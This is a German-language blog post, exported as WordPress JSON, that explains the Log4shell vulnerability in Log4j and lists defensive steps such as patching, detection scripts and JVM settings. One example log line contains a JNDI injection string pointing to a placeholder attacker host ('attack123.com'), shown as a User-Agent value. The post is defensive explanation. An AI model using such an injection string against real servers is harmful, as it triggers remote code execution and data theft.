{"id":672,"date":"2021-12-25T14:12:09","date_gmt":"2021-12-25T13:12:09","guid":{"rendered":"https:\/\/www.mankord.com\/article\/?p=672"},"modified":"2022-01-04T13:56:11","modified_gmt":"2022-01-04T12:56:11","slug":"log4shell-log4j-schwachstelle-und-schutzmassnahmen-einfach-erklaert","status":"publish","type":"post","link":"https:\/\/www.mankord.com\/article\/log4shell-log4j-schwachstelle-und-schutzmassnahmen-einfach-erklaert\/","title":{"rendered":"Log4shell: Log4j Schwachstelle und Schutzma\u00dfnahmen einfach erkl\u00e4rt"},"content":{"rendered":"\n

Kaum ein IT-Thema geschweige denn eine Schwachstelle hat die Tagesnachrichten in der Vergangenheit so dominiert wie Log4j. Doch was steckt wirklich hinter der Sicherheitsl\u00fccke und wie k\u00f6nnen Sie herausfinden, ob Sie oder Ihr Unternehmen betroffen ist?<\/p>\n\n\n\n

Was ist Log4j?<\/h2>\n\n\n\n

Vor nicht allzu langer Zeit w\u00e4re wohl keiner auf die Idee gekommen, Log4j als Synonym f\u00fcr eine Schwachstelle zu verwenden. Das Framework wurde ehemals bei IBM entwickelt und ist seither der De-facto-Standard f\u00fcr die Ausgabe von Lognachrichten in Java-Programmen. Entwickler k\u00f6nnen Log4j kostenlos in ihre eigene Software einbauen und das Framework als Schnittstelle f\u00fcr eigens definierte Warn- und Fehlermeldungen verwenden.<\/p>\n\n\n\n

Der Clou an der Sache ist, dass der Programmierer bei jeder Meldung einen individuellen Rang vergibt (Info, Warnung, Fehler, …) und der Programmbenutzer sp\u00e4ter \u00fcber die Einstellungen entscheiden kann, welchen Rang eine Meldung mindestens haben muss, damit sie ihm angezeigt wird. Das ist besonders f\u00fcr gro\u00dfe Unternehmen, die eine Vielzahl von Server warten m\u00fcssen, attraktiv – hier w\u00fcrde jede weniger wichtige Information nur unn\u00f6tige Arbeit machen. Das Log4j-Framework wurde mittlerweile in anderen Programmiersprache wie .Net und C++ nachgebaut.<\/p>\n\n\n\n

Log4shell Sicherheitsl\u00fccke<\/h2>\n\n\n\n

Der IT-Sicherheitsdienstleister LunaSec hat im Dezember 2021 eine Sicherheitsl\u00fccke f\u00fcr Log4j publiziert<\/a>, die fortan Unternehmen auf der ganzen Welt besch\u00e4ftigt. Durch ein „Feature“ kann man Code, der auf eine Webserver gespeichert ist, in der Warnmeldung \u00fcber eine normale URL verlinken. Log4j folgt diesem link und f\u00fchrt den Code lokal aus. Bedenkt man, dass bei dem Loggen von Nutzeraktionen insbesondere Informationen \u00fcber einen Benutzer mitgeloggt werden (z.B. Benutzername oder der Name des Webbrowsers), dann wird schnell ersichtlich, dass ein Angreifer diese Informationen zu seinem Vorteil manipulieren kann.<\/p>\n\n\n\n

Besonders kritisch ist die Schwachstelle bei Servern, welche das Javaframework Log4j verwenden. Der Angreifer kann den Namen des Webbrowser (genannt User-Agent) mittels eines Browser-Addons gegen den Link zu einer malizi\u00f6sen Code-Datei austauschen und normal im Internet surfen. Verwendet nun ein Webserver Java und loggt den User-Agent, k\u00f6nnte folgende Nachricht ausgegeben werden:<\/p>\n\n\n\n

INFO: Request from IP 123.123.123.123<\/em> with User-Agent mozilla-${jndi:ldap:\/\/attack123.com\/codefile}<\/strong>-firefox<\/em><\/p>\n\n\n\n

Der Code wird dabei von der URL gedownloadet und ausgef\u00fchrt, wobei ein Angreifer Daten auslesen oder Viren einschleusen k\u00f6nnte.<\/p>\n\n\n\n

\n \n Kennen Sie schon unsere Services<\/a> im Bereich der IT-Sicherheit?<\/span>\n<\/div><\/div>\n\n\n\n

Diese Ma\u00dfnahmen sollten Sie ergreifen<\/h2>\n\n\n\n

Damit Sie sich vor der Log4j-Schwachstelle sch\u00fctzen, sollten Sie folgende Ma\u00dfnahmen ergreifen:<\/p>\n\n\n\n

  1. Recherchieren Sie zum Beispiel mittels dieser Liste<\/a> oder in einer Suchmaschine mit dem Suchbegriff Anwendungsname Log4j<\/em>, ob Ihre Software von der Schwachstelle betroffen ist.<\/li>
  2. Verwenden Sie ein Script wie den Log4-Detector<\/a>, welches die installierte Software automatisch auf die Schwachstelle \u00fcberpr\u00fcft.<\/li>
  3. \u00dcberpr\u00fcfen Sie die betroffene Software auf Herstellerupdates, die die L\u00fccke schlie\u00dfen.<\/li>
  4. Nehmen Sie (wenn m\u00f6glich) betroffenen Serveranwendungen vom Netz.<\/li>
  5. Blockieren Sie das \u00d6ffnen der Links durch die JVM-Einstellungen:
    1. com.sun.jndi.ldap.object.trustURLCodebase = false<\/em><\/li>
    2. log4j2.formatMsgNoLookups = true<\/em><\/li><\/ol><\/li>
    3. Setzen Sie die minimale Rechtevergabe<\/a> um.<\/li>
    4. Installieren Sie einen angemessenen Virenschutz und eine Web Application Firewall.<\/li><\/ol>\n","protected":false},"excerpt":{"rendered":"

      Kaum ein IT-Thema geschweige denn eine Schwachstelle hat die Tagesnachrichten in der Vergangenheit so dominiert wie Log4j. Doch was steckt wirklich hinter der Sicherheitsl\u00fccke und wie k\u00f6nnen Sie herausfinden, ob Sie oder Ihr Unternehmen betroffen ist? Was ist Log4j? Vor nicht allzu langer Zeit w\u00e4re wohl keiner auf die Idee gekommen, Log4j als Synonym f\u00fcr …<\/p>\n

      Log4shell: Log4j Schwachstelle und Schutzma\u00dfnahmen einfach erkl\u00e4rt<\/span> Weiterlesen »<\/a><\/p>\n","protected":false},"author":1,"featured_media":673,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"categories":[5],"tags":[],"class_list":["post-672","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-guides"],"_links":{"self":[{"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/posts\/672","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/comments?post=672"}],"version-history":[{"count":18,"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/posts\/672\/revisions"}],"predecessor-version":[{"id":701,"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/posts\/672\/revisions\/701"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/media\/673"}],"wp:attachment":[{"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/media?parent=672"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/categories?post=672"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mankord.com\/article\/wp-json\/wp\/v2\/tags?post=672"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}